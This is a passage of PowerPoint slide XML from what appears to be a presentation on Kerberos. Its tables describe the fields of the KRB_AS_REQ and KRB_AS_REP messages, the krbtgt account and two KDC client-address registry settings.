                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>IP addresses from which ticket will be valid.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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14"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="168168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Encrypt Authorization Data</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Not used for KRB_AS_REQ.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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15"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="168168">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Additional Tickets</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="5187" marR="5187" marT="5187" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Not used for KRB_AS_REQ.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0"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16"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="正方形/長方形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="257504" y="1805939"/>
            <a:ext cx="1601776" cy="747999"/>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正方形/長方形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="257504" y="2698802"/>
            <a:ext cx="1601776" cy="2847985"/>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四角形吹き出し 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2041349" y="1973365"/>
            <a:ext cx="3050697" cy="324665"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61948"/>
              <a:gd name="adj2" fmla="val 53448"/>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400" dirty="0"/>
              <a:t>Pre-authentication Data</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="四角形吹き出し 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2041350" y="4113970"/>
            <a:ext cx="3050697" cy="324665"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -61948"/>
              <a:gd name="adj2" fmla="val 53448"/>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400" dirty="0"/>
              <a:t>Request Body</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1769737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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 29"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>KRB_AS_REP message</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="コンテンツ プレースホルダー 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="360000" y="1260000"/>
          <a:ext cx="8396306" cy="4699127"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{6E25E649-3F16-4E02-A733-19D2CDBF48F0}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1517452">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6878854">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="187325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="3429" marR="3429" marT="3429" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" dirty="0">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00"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Protocol Version</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="3429" marR="3429" marT="3429" marB="0" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ja-JP" sz="800" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ja-JP" sz="800" b="0" i="0" u="none" strike="noStrike" dirty="0">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01"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Message Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>KRB_AS_REP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike">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02"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="301808">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Pre-authentication data</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>For the KRB_AS_REP message, this field will normally be empty.  </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>One exception is if the client logged on with a smart card. In this case, because the user did not enter a name and password, the LSA does not have the user's password. So, the user's NTLM password and credentials are passed back to the LSA in this field (hashed and encrypted with the user's key).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" dirty="0">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03"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Realm</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Realm or domain of the requester.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" dirty="0">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04"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Name of the requester.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike">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05"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="499311">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ticket</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" dirty="0">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The encrypted ticket is placed here. For the KRB_AS_REP message, this will be the TGT encrypted with the TGS's secret key.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Every domain controller will be a KDC and therefore will run the AS and TGS services. The client can connect to any TGS in the domain to request service tickets. Because the TGT is encrypted with the TGS's secret key, and because every TGS in the domain will need to be able to decrypt the TGT, every TGS's secret key must be identical. Thus, every domain controller will have a user account called krbtgt. This is the service account for the KDC, and its password (randomly selected and periodically changed) is used to create the TGS's secret key.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" dirty="0">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06"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Key</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" dirty="0">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>This is the session key the user will use to encrypt and decrypt TGS messages.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" dirty="0">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07"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="200279">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Last Requested</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The last time a ticket was requested. This is similar to a "last logged on" time. This can be used to track how frequently a client is requesting tickets. A Kerberos policy can be set that limits how frequently ticket requests can be made. Such limits can help prevent brute force attacks.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" dirty="0">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08"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Nonce</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The nonce from the KRB_AS_REQ nonce field will be copied here.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike">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09"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Key Expiration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>When the user's key will expire. This is used for password aging.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike">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10"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Flags</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>These are the flags set in the ticket, based on the flags requested in the KRB_AS_REQ message and the domain's Kerberos policy.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike">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11"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Authentication Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" dirty="0">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The time the ticket was issued.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike">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12"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Start Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) At what time the ticket is valid.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike">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13"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>End Time</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>At what time the ticket expires (although it can be renewed if the ticket is renewable).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike">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14"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Renew Till</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) At what time the ticket absolutely expires (cannot be renewed past this time).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike">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15"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Server Realm</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Requested server's realm (domain).</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike" dirty="0">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16"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="101529">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Server Name</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Requested server's name</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="800" b="0" i="0" u="none" strike="noStrike">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17"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="891537">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" strike="noStrike">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Client Addresses</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">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dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>(Optional) Addresses from which the ticket will be valid. This is important in several situations. Normally, a ticket is only valid if sent from a specific address.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In Windows 2000, the KDC did not propagate the addresses to the ticket. Because of this, two new registry keys that affect Client Addresses were created for Windows Server 2003:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" u="none" strike="noStrike" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>KdcUseClientAddresses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Not created by default, this setting will configure the KDC to propagate client addresses to tickets.</a:t>
                      </a:r>
                      <a:endParaRPr lang="ja-JP" altLang="en-US" sz="800" u="none" strike="noStrike" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="1" u="none" strike="noStrike" dirty="0" err="1">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>KdcDontCheckAddresses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" u="none" strike="noStrike" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Not created by default, this setting will configure the KDC to skip checking client addresses. This feature might be used in network address translation (NAT) scenarios.</a:t>
                      </a:r>
                      <a:endParaRPr lang="ja-JP" altLang="en-US" sz="800" u="none" strike="noStrike" dirty="0">
                        <a:effectLst/>
